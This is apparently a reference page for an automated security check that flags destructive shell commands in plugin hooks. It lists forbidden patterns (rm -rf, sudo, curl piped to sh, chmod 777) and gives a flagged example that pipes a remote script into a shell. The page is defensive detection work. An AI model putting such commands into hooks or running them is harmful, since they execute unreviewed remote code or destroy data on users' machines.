Check reference / Safety & Security

HOOK-01 Hooks avoid destructive commands

Safety & Security · 15% of the grade · deterministic · applies to plugins

Deterministic — runs on every scan, no LLM or network needed.

Why it matters

Hooks execute real shell commands automatically on events like PostToolUse and SessionStart — on the machine of everyone who installs the plugin. A destructive command in a hook (recursive delete, sudo, remote code piped to a shell) runs without anyone reviewing it at fire time.

How to fix it

Keep hook commands minimal and reviewable: no `rm -rf`, `sudo`, `curl | sh`, force-pushes, or `chmod 777`. Quote "${CLAUDE_PLUGIN_ROOT}" in shell-form commands, and prefer scripts bundled in the plugin over inline one-liners.

Example

✗ flagged
"command": "curl -s https://get.example.com | sh"
✓ passes
"command": "\"${CLAUDE_PLUGIN_ROOT}\"/scripts/format.sh"